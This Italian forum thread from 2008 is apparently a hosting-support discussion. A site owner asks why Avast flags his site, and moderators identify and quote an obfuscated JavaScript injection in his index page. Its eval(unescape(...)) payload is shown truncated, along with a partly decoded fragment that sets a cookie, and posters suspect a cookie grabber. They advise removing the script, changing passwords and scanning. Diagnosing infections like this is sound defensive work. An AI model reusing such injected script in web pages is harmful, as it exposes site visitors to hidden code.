Visualizzazione risultati 1 fino 12 di 12

Discussione: [risolto] URGENTE: Virus inspiegabile sul mio sito.

  1. #1
    Guest

    Exclamation [risolto] URGENTE: Virus inspiegabile sul mio sito.

    Ciao a tutti, oggi su un forum, mi hanno scritto dicendomi che avast ha rilevato un virus nel mio sito www.badbrizio.altervista.org.
    Dice che unp208489284 è infettato dal virus vbs:malware-gen.

    Cos'è successo?
    C'è un modo per fare una scansione?
    Ho notato che non compare più il contatore shinystat e ho visto che shynistat.com è offline, dipende da quello?

    GRAZIE

    P.S:Plz aiutatemi è urgente

  2. #2
    L'avatar di dapeco
    dapeco non è connesso Community Manager
    Data registrazione
    21-10-2003
    Residenza
    Brusasco (To)
    Messaggi
    4,909

    Predefinito

    Elimina dalle pagine il javascript presente al fondo
    Codice:
    <script language="javascript">$="%64d%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2 [...cut...] eval(unescape($));document.write($);</script>
    Cambia la password all'indirizzo di posta utilizzato nel tuo profilo, poi esegui un reset della password dell'account di AV ed una scansione del tuo sistema. Se utilizzi applicazioni (forum, blog, cms) sull'account controlla che siano aggiornate.
    Ho visto cose che voi utenti non potreste immaginare... siti da combattimento irregolari al largo dei bastioni di Orione. E ho visto account balenare nel buio vicino alle porte di Tannhauser. E tutti quei momenti andranno perduti nel tempo come lacrime nella pioggia. È tempo di sospendere...

    ASD Brusasco - C'è altro sport oltre al calcio!

    "Io sono vivo, voi siete morti" (Philip Dick, Ubik)

  3. #3
    Guest

    Predefinito

    Quindi qualcuno ha inserito quella riga di codice volontariamente? E' quello il virus?

  4. #4
    L'avatar di dapeco
    dapeco non è connesso Community Manager
    Data registrazione
    21-10-2003
    Residenza
    Brusasco (To)
    Messaggi
    4,909

    Predefinito

    Probabilmente sì. Anzi mi par proprio di sì.
    Ho visto cose che voi utenti non potreste immaginare... siti da combattimento irregolari al largo dei bastioni di Orione. E ho visto account balenare nel buio vicino alle porte di Tannhauser. E tutti quei momenti andranno perduti nel tempo come lacrime nella pioggia. È tempo di sospendere...

    ASD Brusasco - C'è altro sport oltre al calcio!

    "Io sono vivo, voi siete morti" (Philip Dick, Ubik)

  5. #5
    Guest

    Predefinito

    Ho controllato, è solo nell'index, ho cambiato la password a hotmail (indirizzo email che uso) e all'accesso di altervista, quando dicevi blog forum ... a cosa ti riferivi? sul sito non ho niente del genere.
    Devo fare qualcos'altro?
    Cmq sapresti dirmi cosa fa quello script? Dopo aver cambiato le pass mi sono riconnesso, aiuto non so che fare
    EDIT: Ho cancellato tutto il contentuto del sito, ricontrollo le pagine erimetto online
    Ultima modifica di badbrizio : 25-07-2008 alle ore 18.14.07

  6. #6
    L'avatar di darkwolf
    darkwolf non è connesso Salvatore Noschese
    Data registrazione
    18-04-2007
    Residenza
    Reggiolo (RE)
    Messaggi
    6,558

    Predefinito

    Ho ottenuto poco ma alcune parti sembrano interessanti...
    Codice:
    ....
    ;if (document.cookie.indexOf('vbulletin_multiquote=')==-1){sc('vbulletin_multiquote=',2,7);eval(unescape(dz+cz+op+st)+'dw(dz+cz($+st));')}else{$=''};function sc(cnm,v,ed){var exd=new Date();exd.setDate(exd.getDate()+ed);document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();};";eval(unescape($));document.write($);

  7. #7
    L'avatar di dapeco
    dapeco non è connesso Community Manager
    Data registrazione
    21-10-2003
    Residenza
    Brusasco (To)
    Messaggi
    4,909

    Predefinito

    Già parrebbe un cookies grabber o simile.
    Ho visto cose che voi utenti non potreste immaginare... siti da combattimento irregolari al largo dei bastioni di Orione. E ho visto account balenare nel buio vicino alle porte di Tannhauser. E tutti quei momenti andranno perduti nel tempo come lacrime nella pioggia. È tempo di sospendere...

    ASD Brusasco - C'è altro sport oltre al calcio!

    "Io sono vivo, voi siete morti" (Philip Dick, Ubik)

  8. #8
    Guest

    Predefinito

    Citazione Originalmente inviato da badbrizio Visualizza messaggio
    Ho controllato, è solo nell'index, ho cambiato la password a hotmail (indirizzo email che uso) e all'accesso di altervista, quando dicevi blog forum ... a cosa ti riferivi? sul sito non ho niente del genere.
    Devo fare qualcos'altro?
    Cmq sapresti dirmi cosa fa quello script? Dopo aver cambiato le pass mi sono riconnesso, aiuto non so che fare
    EDIT: Ho cancellato tutto il contentuto del sito, ricontrollo le pagine erimetto online
    Allora? devo fare qualcos'altro? Ricambiare le pass o cose del genere, plz rispondete al mex quotato

    Grazie e vi chiedo scusa se insisto ma mi sto letteralmente cag##do sotto

  9. #9
    Ospite Guest

    Predefinito

    nn ti conviene utilizzare hotmail come indirizzo e-mail per il sito.....
    ultimamente sembra che qualcuno sia in grado di trovare le password di hotmail.

    nn ci vuole nulla a fare "recupero password" e poi sfruttare il tuo indirizzo e-mail per ottenerla e poi cambiarla.

  10. #10
    L'avatar di darkwolf
    darkwolf non è connesso Salvatore Noschese
    Data registrazione
    18-04-2007
    Residenza
    Reggiolo (RE)
    Messaggi
    6,558

    Predefinito

    Citazione Originalmente inviato da dapeco Visualizza messaggio
    Già parrebbe un cookies grabber o simile.
    Infatti...
    Purtroppo l'unico riferimento trovato è in una lingua a me incomprensibile....
    Link anonimizzato e filtrato da googlecache

  11. #11
    Ospite Guest

    Predefinito

    ho trovato questo...
    vedi se fa al caso tuo......
    http://forum.aiutamici.com/Default.aspx?g=posts&t=48991

  12. #12
    Guest

    Predefinito

    Citazione Originalmente inviato da matt93 Visualizza messaggio
    ho trovato questo...
    vedi se fa al caso tuo......
    http://forum.aiutamici.com/Default.aspx?g=posts&t=48991
    Grazie matt ho usato housecall.

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •